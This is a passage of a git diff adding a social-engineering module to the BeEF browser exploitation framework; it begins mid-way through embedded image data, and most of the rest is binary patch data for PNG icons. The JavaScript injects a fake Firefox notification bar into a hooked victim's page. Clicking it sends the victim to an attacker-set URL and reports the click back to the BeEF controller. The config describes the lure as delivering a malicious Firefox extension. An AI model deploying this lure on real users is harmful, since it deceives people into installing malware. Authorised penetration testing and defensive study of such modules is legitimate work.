Pqdraz/sDjzKBrv4zu2+a2t0/HHzjd2Lbcc2sG7GtsL42K+xLfxtUgI7YHqKlqHK8HbCCXgjHT1cAdMlDetv4FnQ2lLasaOl6vmB0CMmwT/IPszSueHQqv6i/qluqF+oF9TfO2qEGTumJH0qfSv9KH0nfS/9TIp0Wboi/SRdlb6RLgU5u++9nyXYe69fYRPdil1o1WufNSdTTsp75BfllPy8/LI8G7AUuV8ek6fkvfDsCfbNDP0dvRh0CrNqTbV7LfEEGDQPJQadBtfGVMWEq3QWWdufk6ZSNsjG2PQjp3ZcnOWWing6noonSInvi0/Ex+IzAreevPhe+CawpgP1/pMTMDo64G0sTCXIM+KdOnFWRfQKdJvQzV1+Bt8OokmrdtY2yhVX2a+qrykJfMq4Ml3VR4cVzTQVz+UoNne4vcKLoyS+gyKO6EHe+75Fdt0Mbe5bRIf/wjvrVmhbqBN97RD1vxrahvBOfOYzoosH9bq94uejSOQGkVM6sN/7HelL4t10t9F4gPdVzydEOx83Gv+uNxo7XyL/FtFl8z9ZAHF4bBsrEwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAW5pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlIDQuNC4wIj4KICAgPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIKICAgICAgICAgICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIj4KICAgICAgICAgPGRjOnN1YmplY3Q+CiAgICAgICAgICAgIDxyZGY6QmFnLz4KICAgICAgICAgPC9kYzpzdWJqZWN0PgogICAgICA8L3JkZjpEZXNjcmlwdGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4K5T8NQQAAAE5JREFUGBmFTsENwEAIgg7T/efpMlRMMLafM1EBMUoAqoT0uE2Qd2NWbYOZJHOQHI0lfgQbEl64TLKZwdbasAd/3IZ9M4ZoxyfnxP5j4xfHNiMDVDlNEAAAAABJRU5ErkJggg==);'})
+	var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
+	$j(hid).append(ell);
+	//$j(hid).append("<u>Problems installing?</u>&nbsp;");
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		window.location = '<%= @url %>';
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});
diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml
new file mode 100644
index 000000000..a501a37aa
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_ff:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Firefox)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_ff/img/install.png b/modules/social_engineering/fake_notification_ff/img/install.png
new file mode 100644
index 0000000000000000000000000000000000000000..fb44d07a6da326a5269428b69ac72899ad577768
GIT binary patch
literal 2092
zcmV+{2-Ek8P)<h;3K|Lk000e1NJLTq00310000*V0ssI2^#_z{00001b5ch_0Itp)
z=>Px#1ZP1_K>z@;j|==^1poj532;bRa{vGi!vFvd!vV){sAK>D2f;~1K~z{r<&s%Y
zQ}-Un^WLZXe5X&&edtVUy)zb<+FHaSPz;WW-ccces{xS!caT63Bw<yyYVisZR7gOA
z2}_d@g4siIAR8nkWFssIOHKl0VM~Mr?;+7l$J^T4hrVRy^YA_Y^ZR|j|L>Ut^V!MT
z(T8k$1A|%@Iq(M?P0Ii7IC@~_iAOR~hj)GM&8|IiaIfeAUdxh!0F!d7Z5HX99a}`P
zw_`I-GWD_tFkraSu_$}9vlwZZG(%HkjZpsz$Aa|D>xD?eq+w2tH9-B#?F(ajuPu>=
zNyC^LtA_zByxl6^^UXvWrb*h=XdO(#!r85&J>N7$U`sdJiNRtr?>0Pf1yBAQyXzVb
zxq95J35ps>eAvfj9;Ea=Us*H!iMSoNir!SvJHqjP<ZX?U15=~5!TuKEp4Yg~wtj|L
zneffmH9b^s=;XIq=i##Nx4VCBz_%*LBaRV8vVDO(P7=vJY-JVxgv`2WvT8m&_N#CG
zn^UujzUg_z?(bdry>+9yUmNUy*KXnMZR<jK)E!9p4^*XKV~IPZV(P_REZQ^qq`<qW
z+jGhEKqrgVHX>$N4TDU4{Gmh?h5xf>O|@$5=h6r)`cv72==HYFw=#xD93=_?-^wWT
zAxJ_X?C;-DPb(>NTBeBgl*Q~a%}V{-I;-FTGAqMm8F$SO>oh_il(nuf%jgR$6VRgD
zOcyW-(6C0{3rz6CRw3bES4}Ia%i!d$N2-@nb@F~5qfHDj-JZ9N-kT3U8r4)Sa1ZKV
zYM<xqZD~Sy)X$Od1ges2VBJaj=4eg<x+vp(d~)iT88FjJuBTqa7H3x!=l8P+4e5su
z9EmGweza_rupc7+Q<#IllX4b*g{>O#tw{F!3&cLhz90$3VSk@Pj7|7^5+c14ht9j6
zbO~L&U{hKJjmRvNX?_go%0d^`+FhDGaG)YNnV{gfjQ!Q9gzSPFRoDy^{NRC<vanT1
zY%dE+ktfJv$-1>GE$YCvTeomUH<G@OCXH}+-<5iACG==iz0?9VQ2!EeemJnD3gJ<=
zA>i>8#ju`*O^kzc)Fa;co;w%ePs9V<AFpNM>TE9M<`UoIQ8_8;(V6#FpskH@=j`y>
zs(cG%Kh8Q++WunQA;Ke$5CsCSLl_jou)o(X%uhUkY3bN<k8heg^3R`cWHPOSdSuph
z<GdK?%tT{qK&L8T>n%^dNKi23J-Iis3THq?z$IZ;#($nt9N3!J^(ee9nb#$My*|FR
z%qc~F-8~}oSc!-e|7@ZUde=reF-e7w3G44lh0}j2j4HAgsD?>~O29d0U{evot$Knu
zdxj!s>W2z5vh&P~iU8Pq@9K92FM2GajkyV*!O?dm657V5!bw3!XI8IlDt6qjcuz3b
z&mTE`D(cYZUlg`IciVaR)F>jK>wPD}{$7xaOFcpoaDykzwv4lQN}q*)A9*v~I46{J
zqR^O1a7__dep#M;o-j(K<1Xg@*yIY{ZIPOJ3{@J~WDnM-or^gd8x!A1C9N(Emm-dL
zi+CQ(^SleO!x}}vEn-x`Q?NA-=i5@@^j`|&M3+{w-~SFc%Lr^pL%1iJgZ&x$p@NL;
zT=Rl7V58i-@?Ak!&;EeDpIn~?k4<`|7da`2=*-HM4XH<qi#-_kQab2c6Fkc~RY-W|
zwsY{QUlI9iF9-?fL$JgCUXYEwe5jQfOk5_HC&$&Y`z^d0<jpkW98W^Jfi9>3*Q9|t
zVnJd;Gte_o9FHikU3Kr@P2ZmKRXR3o6%t#EL&5$W&-~M1e`&xiU{pf=s~wQfyI%h<
zj1wfSqzWb;Dh6i<0vkXOiBtaY+7B_^K%b78pOK9=F8~1>`QDY21s&~E^t(K@z-4)w
z3;%XNA#%P<J$eqUbBbJ&+X<)sC7BbfN^!>z{G*USaD&76)WbynkQZcy#5;e$Ya7b{
z_LDO?CG%FUl8TCtzalenEW9e@O@wiltL{giK6`mm#~7!g4*%`oBN=s^oEd#0fj!CC
zHnx{t`s~w7x5HK;v9(AqMI7xGu{`swc^6I(PXYlKhf$fBf~_!#aCzu_ou;KI<tkT0
zX)U-);M2qFhVgcdqyi>pVr}MLzefbIyT%#7#m2@&!PD~Ol9~q(Di)VTevnG8OmAg%
zkCRasVxr>WPBabDpkXgauDTo*`|m7+j@DQ9J+yTWiSBF5ZljUb?JQFD)mL(s&(0!N
zUu7#;A%BSNB}Q4w7df}CT#Ac|y>zi(&<7oY@<(-zSgV!i_t2R2Dd%F2<>Y7A;&KMH
zP|&N<HdONdaPq_32`95l!d7n$mj~NxQhDR7jRjKkU6kA;@;lk1#9Q}Uo92M>VhqNh
zZNX<Ch1#BuQbdPnAiQo+KGTTHq5efSGsW-W|21qc(aKT|6M0avk4#+XY0f-zyQ}r1
z7k?wjpll2GC;Q!;zlQClzKXP{E`I+XjI)h3<R^c5^2C=XqoOj)u+!ksA6)$1F@vI2
zBgVtTgBaWN3%`3f(l97mG$T0Z|Hs%&B)^LpX&B^>H6vv(CAWA+)$CuR`Pb-?!_Laj
z8cBmmiibH2b-aPwM#WEa>XyhsJK7*(V4O3JupL{I!%(Xh-jTD5A_uLw)M>7Vy8jQI
W@|e0HzdY*z0000<MNUMnLSTYM3j$F9

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_ff/img/jigsaw.png b/modules/social_engineering/fake_notification_ff/img/jigsaw.png
new file mode 100644
index 0000000000000000000000000000000000000000..74d3c2f8ec8330e37f2569889e007e87759cf4eb
GIT binary patch
literal 802
zcmV+-1Ks?IP)<h;3K|Lk000e1NJLTq000*N000&U0ssI2q!f@+00001b5ch_0Itp)
z=>Px#1ZP1_K>z@;j|==^1poj532;bRa{vGi!vFvd!vV){sAK>D0=G#-K~y+TrI7ni
zQehm%&!1CUt=r0)nXQT9UC0}PTo2yxf>93BiHJ&MHB7`CqymcdgRWZW#5v7w+Lq3&
zF)@`ik09F0F0KPx-$Y-}Qh#Fm?Cd!&&-390%)jv{crgFQ!^7~cANtXM6U-0Q1Lz?f
zt&gqp@geo*viXqC-ViL-{rn=#x;t6tLypJCgiZ`=4(w15!P32-Eq8ZEODQ9XULfHv
z&X^ADP!BP`w+k`(Tx0JmAG0Z6^s6k!io6`&t?J^*v3qZaYvJ(qpz52;NbRGH`Mj1L
z)-1}KywfL-0%y-0qeq5wIVo2e(RA8{OQ9!EojAfsxa@p)f3J^*UJF>v0mwCTRYhKW
zYy=~bp3ID8vzWM$oyksy*MvA4Ajx67-Z!H@HDJCqQvlM_sa8p0nVZcQi#R!1JP7a%
zAQEKAr1;{reql=MnQekH8bSa|2jW?uuBWSMXrSl%wOk|uSHR0<GwW1BF6)Xyo=P}$
z)FD{f5kH9DpYA8*dau>2g-Zpl6Chj6Wu+xWM}>!nor|J{&b-o4hnUaPj(FLxcr&P6
zo~f^^DG>0|;rp}jOxS}30$k8;>(r>r8tbdvP6Kra7GnU?ZOp}!;^-j~JcgMVDdeZi
zOA2ntBw`U86!5GlEBxXxZLSV(61IPT%I**XMtTf8xD6^reiSV%GU8%dO1!?IcEMr)
zIAv2;m*T<<uoUI<=clx!=fO6+tL=c1?ly$UP|4*a3wUX;>Fuukz0$Vo(BH0+iUceW
z3Hhmxi8^W@Ww5j&MhCPdvOM_x#YJM>U8#3YH*Qz*I1Fhat|*tOtL3ig25KK=j9hI&
zd|$RM%?&TjjeK^F5TBlItr)+$x@JF&xSXTJ{E%m{e~W0R_E82)bMSygA3PXIGzJg$
ghiD8QurvhEU+N1~Zv}Jp&Hw-a07*qoM6N<$g5%P5%>V!Z

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_ff/img/plugins.png b/modules/social_engineering/fake_notification_ff/img/plugins.png
new file mode 100644
index 0000000000000000000000000000000000000000..73104156c742966853058a9c47108f31cfa10d59
GIT binary patch
literal 13781
zcmYkD18gSD{<dqoTRhcM?AEqzY;D`NZQHipt!>-x*0$U4J^ypw<jbA$WSGqSl9?-9
z?zb2s91a`^2neEtxUd2U2)NxpaR3a|Kfc}T<mx{GsH1|IAV|$L-swLH2vY$W0T7V-
zSojZp$bZtXcH-)eARtJC|8bznR7kiWAS@OV!U9TeI+xziUP+Ii-&~&8UC)Gp_)kCB
z_HC*=RL*-NG_9=XG%%iZ<+TXO8HJ5Pcm!b}8b-H0uRFA8Q?(qZzMmaa;~-FA418(4
zb2^c7w7Ty<wR1mN=AErBLtnyR{?!K@#G8A<1N?W`Os!z=>gtK=Ar@2Q|BAIfVX#k&
z_#(-!miVR(kVPPb|B(+9gpvi~IF;t?VvT@q?iE|*u?5}g@Hhl-4kpZlV{m!-*wVIk
zy)QA?f0Y{U7q9Y`INGaC>Sn--3i@B=Rg_@N({c^Q<bq34S)wLP2<Iu1is)}MK)7Z0
zE^O^FN})D}|2vFJm^l9pFLi`0Jqp908Xj7g_d*xBVSfLpR|Iu*w8GE#1kBCjRhPLs
zZ8sGa1?iw+pZdf@3YFmOm*6jA!vD!m2O_E|VUE%6)66=Ngr*WL#|9}Z;vu*>xeccF
z|62Q}y>D``a)2>RbT@&`)%JHGj8>aXYVu!!E$yID`dlj2GPQ(%YbpnW09s`V=X)Q^
znbjKi*q3cNAla}yKMsmD8O*cDox3Vbf>#0mH(P&s!nh3im|608e_TkTp0uVar#OG~
z^gSy7Qnir(&SNReZ|q#^+QX0;|NNRw)La=0C!=HU`a1OdC^|4O`_?Q1Wg+6<^$>w!
zW|rLhiwS0ltNA1u2OE()F~m=4?*DrWNfoQ3(kvuQ8x<Ah|J0fQgKfUSrlka)s;L(1
zB7sFsGkNlC5_KlZ^1EcEcV`8_Hu)GRx)r&t!%}DhAffEXZDCDOZHP8d|91nw`(R*j
zTI0$fne%^qw)kAqC#Pc01~mkcCKW(ktr$=oVg0u!4ODvdr}1oCtvW}eYn58rq2o$q
z!|!-6JZWm9))SSq^z_2^64ZAjV}qGKyo=4$=zw|F$ut}|G3d&P-b&<CF0{JReu(%z
zB>IjhG}@G67AB013TpagTce~VpK45VSTgx)=b+d?2BgnA=r!*an7ih{(>lS944iuR
zPYUu6?mbh_Lygs>#9(b>&Os=x_QB>8aj^M!Zqzf@&R{H|-PG^xG-n)3*Tr74X{@JI
zIcY-^sD%}Vu9;uOJwe1`*+oPoh?WPqdt7U{sWF>!EE>khXt5>*3!AV6NUAp6(3a#<
zyy56*n!;}C#MT=+cr~m7a%t$)qH_!Fi;3*BMv>&Xm15-cIvN4^>WopaPJ`dm$*NoI
zbsT`M9Dh69?oWCgrT#Z<@x%>6^4>4DwP#U=Em|&f9u~W48~-}MZ11C`a@PIM{sb^~
z-z^^vy#%8F4$k7RiSifP!JqsER&1LTi*DOvPZaLU;MsSql`rSzRK1ySK{q$gfpx90
zVdq<JEXl%CWxbvCX7brK!qpM~<Ke?pviK$ia5DeMGXIW?S8|gds4u$0d5ztm9s5jn
zCrTI!zgL6|eseBQStuP_^@T5#g}`^>i|QB_C^#J`SpcFgvh{2qH#D}4FZqI-SQTI1
z)^u)}>KUl8N{w1z?3o5eUGEso;a-F}_Z-;M9(cl69h7>zU|Sw^T{;jFsvFuxfQo}b
z<MexTr%q;8XMT2UW$CYNO}vWQFL|fOJJHhCy9Wn>etsaIBSS-wM@L6>EiL}Z&ER<1
zo4d!y(6+X~w8Z)jwe;h6PhT;_?v40>+~pkp{EIu}9{8oLl+<vV(*(!$mD;6UCk0Lg
zDhzsJxp>6_hM2*ma+T=6GF-QZdz@uqfx%ro`z9iUqdJ67wOY8EaCdby&F)IZDOuvf
z@$)(Ihi!71_+H)&t|}mSboIJOc-L)>A9Ng_$%B@4)X=`Zli8=xp;A`&Yu2+*PlT^(
zq;NRX{qk$UFU_~BY0F@j#wj$5%IPUF;IE9I*pN|?{Ym7h^62%5MoF$Fu3Gi>Uo^w|
zO~#Ux6LpVnEX?ave?n;65E16SUc}T-UN8<k#+(mH_itkxi43(rKexnJ?a_u38sDV1
ziKuCD&;=p#m%c#>RI7gLN5HYU-y^a6L}3@KZmkh;l-}tbPPp^keD3bhJ@oAVg`$3C
z2He5_ovZMO@1!Gmjg~ywc^)bByG~W;jw`9m2lGTK%`epS9&@KvYN;;=6qL%A+RdVt
z6rP;FPW<?-z4vOHgKV%dbc=r6+vABeikoTQS%I8L8miZj%kbpm3FBGeDb}3&qxgup
zGXFY@yW+~Gs3@tRTal^ajuskxhrvG#wkhz{?5Q_J!|O$v^GtaizNMC;2SjWFfmv5^
zd$uF6mW_0zz1M@;IY(k6fHN5SbWU#aG0t!ZOT7%&n4@2rJNOqOIfbooZp1O#JsYz`
zyrNv-#Ye{d)0olPglnh0fCMD+;bIkQ*`lbOot<BBFeEh%jlO|_AWas)%Gz4r)U@<_
zdU+W~k<_iAQ4zFSR4h?SQEOcW9H;2Z346rqz%JSx^X}b?o@5-AbXGuPB}_6Msyf(s
zlp>Me*czTKvyojs8LTZmd6dRn&{&AgD%)Dm(qva}gNiaPOMB+pb5>C`>W4MVRrXoG
zqhjb?m6s9bpS+4T<Y<f`KiwZC(3(P&r$Nb$OiC<=s|}Ao=QpBuPxk%zp-IF&op0<K
zg4@DTmF8Iu6odEgOq5#6#p_mk`;|hU)}fS~E#@X!k5eS_>ze~BS&9J_v__^%gtba$
zrpOoCR{8@jtjC9h<rDZlxqBQ2<Pg!i@|Bns!xlw{Z22k$fvKt0I#g;|X+avb>{>w3
zBoh|FgTEk}D)}i=a&p^<ToJD_%s5FVScH+@Ro2Qv#TWc^#_&&_)K3?ss-%IFi<n<Y
z?M=!n`5HAsiUNSU@!}J*gEKD`0&fo{t`f3=?O!4eq8Ma4xb3ZfwJvD*-5z2^m!caI
zIGI^TPq@nc3Tt_y)-~-I8{vvEE>9R6=!;A>+=X})8Z6{gs6s2mrtP7<vZLiyH^Yz=
zsn|6fq~HIJPQ~{}u%8&=FXpTb%xq&<CpVWRJr{5`62MK1h)MEQz)Qx<^KWLblWpSZ
z4@fpqVn{Z?#cTINt`rE1h#+qEj}R`qiqp);Wrjv?Fv_i4gOQnvLA0tB)K&w=N-O16
z<^m+cF}nv>9=Oj6-}()T9I7aBJ&7tQg`=&1V#YWNn`(0H?t-aG*0keV*i#2yRwwii
zuE8E{Dg3bCK3m6)PuTDqFVSgrU+)VzTq!Ljp8ARB`rFB9hb!Kr0Z#-Y%NE?csgsQ|
zk{{Mlwzu<7Gi+()`>tsDM!K?K2s2qJntK*B+I(xwZ>x@W<U_ojNx_!p8gLv(%hvS_
z!G+4AkS+q6$IDR~3x37a6g7*ubPfOgaio*h;p}R}^Y%Z@s1g7cX*z+}bd1fiWM0p%
z=N9IMT9z`D`83VGt!adWI|aOQrXg)duyCRYb8~hw8Cg$UxXgA!it_z-TYn`}NG@eu
zg?V<Ue(pQhphte=sb9tH$rIiM72udx({*eMdEu`X9scbfj5VQ1Y98zZMTHopv01(2
zh1oaAPJXF{h;KNScHE7>b5+F+eV3ODtZKxFH+0p9?5|J6!b+p*E9cZE@7$plk&<i=
zPr*9$-7%`GN7=pba)IXsvlBVapkue`b#RD#yh_pSE*KYDm-@z=u`w<b)LB})Mq{7F
z6=-A)t-8t+b~foW<Yp=YD_VhzouW$3WqX%~b!aE5lJ@&<94pw*je9$e-!-G-1E<9L
zxrW=kHGt}0S*<|x<Sp`PDlr#%rVOsd&Dhph-4ea#d<j8BEf6d6MJBw}T|C9zmvT7i
zo_kJ+Os9f^7R31sNh3@pffA;`NRnfs=fQ+dZlfdB0`-!B`gU-D=O4pM3J$N2?7b29
ztu3Wtd%FGBm3$%NzFqaCSUBm8zE8UhJN$yJw^twjZ{B6iSzBBfG5lt~<e}h`1gf}P
z)v)~vl?P3Yf%yBT%6vRA_;q^EBZxF|9QmzHcu$R(G_wwQb+teO+^fXR%){tIaUN~I
zgfrF$hinx|mK$f(r-=ALbG~42g>nei>8m;hmAoj+$}X9HkH|UkfPXIYP{@%tg)l&Q
z5)OMZM9p-np{iZqg4Rdje+*&eD8J5n*wagsm#xQm7~lcaLIg41sojt?9im0?mRU)%
zR_1t`XEsOs8ICw^OMXp0I9fCZH*{4Toa|xV#2PYdgv-1^wwyxK$*7}dp&TK}AEd9j
z{2P+&vQw43uqJhPXK2pR>$MHd{;&sSYi-=0G}+|URzj76&|L5|5pFul%gzFp)}YW*
z=-BdZI?^6pNz8Fpgtcq*`}vhZNQPXLp=p0ws$kKAag+~b%y!$%FO3TMN`FjEjgng#
zzjuJ7Y>e~x7z&bH@L1_tOL)u)hgVV0?>{Q!{IO__GeJKy8>isU7eT3st`k+H-Jy9U
zu!+`5$Kz3Xx~aP&L);7^otKm`ek8BG3;=+$CUDR5Jr>d2Q3WxMjaK}PE1%jM^)f8b
zc6Tl1;r4D~Z>dC$Zw%ODhyeLyUF?L#VGAz6+S=-pqf{Q9t_)#%=L$J`P)Rw)6h$B3
z*lwN8C*FK4IcYAYWI{<K8!qV14~Kj{`&Bi-_xbb3Uk48F!=lwrlH^cps?WVnw>;f|
zmWmEUO;^kT-)XnW`=xzhALQW?$QzK$fianl+p{yUvbUvC8S%c@SB=e1LcJhTA^EJ(
z+NV^Z{&rbB_Gsa73``jpGQ*@uS6<FA54hmsV&&Cb6{O@H_D!xSz)&dCK{bndT%v^4
z6wPoAF~zVnPAG+s$&1IUMbrClzm6sduGo}<{F$W0e(?Nu(asKDboqk;{T;Ht*xV6A
zO&KyJe8!*nQ=%%NESOP$25zta?Ao4>=PlcVApJTxRzTlmp20fn$MbT}gTqIIO?WCH
zQP&U6Bx`NRb~oDH9PM?FV&9G2cik<YSqSgJsji+{Z6kt==#`VcYZkt(KQP)QjrUL7
z4;*n7Xe30EclkV_=Jr=rW!4+7CMw%#1YX;YieQn644iU%)p6jnf}*D3xzU0u)Oq8k
zn5yr&E?mU7S}=Wex8Yb=(=|Mi>5Elk*km2bEc6h8{q)_KQOhw5+=>3v8-M-0KY?(@
z-0GfWRz=UciJ?Lo(gY`gvF(1vg=bB~Rl_Kfmy5Jv7Lz$CvZ5{@jW2e#$Hao-a{2gj
zk+?OQ@FbwK5(K`1WMCYRkEv@L82!B&t`$o^c|&HuoD*xBD<wAg$q;9?7WE8|XaD@e
z5>KZM6o_vl+MxuUN~l_PuUNl-EXYXhUB;W^kIpllhIbH_Rek&7WQp2t#;TdB9@Lf0
zlg7)Ff{>NR%+}OK`N_O5tCVO?AKVzrR#1KT@>J-C7xz?9+l3$cY+3+klLnyBYT^o#
z(AI$4*0RU5{!md+ig82Rk3l`Cx61-=@u@>2t0vWp(d1I;?t&L93zt7kEuj4gMu2hZ
zrvGZAG}e@bYt7!o0y&hjod(p8eT#Bpw9_}*#hXn}50FL6$Ri|iI63~2v?^y%R5{F)
zYhrj5AkMB?7T@B6&P(^)D>!Z6^&q(rdC?_ybDKl?;NnzJp$wbL;A6&X2Lk*`igjs*
zVlh5k&0Y)`CD&DRYTnOYQQ1=qM1?&Twc1GuG7Qc>Ns@~9VF%ZwdbfW^m^NnQ)%8yH
zvnoex*k}Amn+;gC6x6FbVbPmc)QzU=;S9(^Vr(2Lez_ILHNb)xD60SyJA;Ix1*s^p
z@VYeyb1?2YAvekhVvXuz#nvW^(I4{^o0CbYBV~fGJcyK&BI1Xins};}5sr7o#)R15
zPw~b1{@}!*@wR9(HEQrqNn>5Y4BgQQ{)3LuDO(9op@~c=aS$tUC0X>#WX~=gC#U;&
zn9Efk+x4XY-1GPLg+bGB%zzuCM&RXjO?9v7^@V6dJ8(P&^I|LB|F@~HG{VKm6I;(P
z*NEpR`<VUN@h7`K;Uw<4ou~o1ZPm!F;TpR_O$fAiuwh_Td@C*JD-UVXfs?@qa%kR7
zY%e<>Rh9d_<EKWB(ZuIrw3|^K&-ev#Q!IY0J(AFUWt8;zer&>Q`QjaAD(1zu8(K9l
zQQDC$<k*<7SHjO=1(TQV=pEU^XJc5{m*a|sA5}MRSXYif8*Zd#F?N#>wS&cF@0Tkx
zL?i93%~D2r{qt~pfq=2`Vg{Un<8DF<Cl?It*8DD!U)H@}g^)10Y=|n#urKGjJwobi
z#SwUoK;$2U4jKq=jIIZP&SbNqq?P$qNE*=aN!ikZ4$U|=-8tC6lYq@F+`3Rlxp}oH
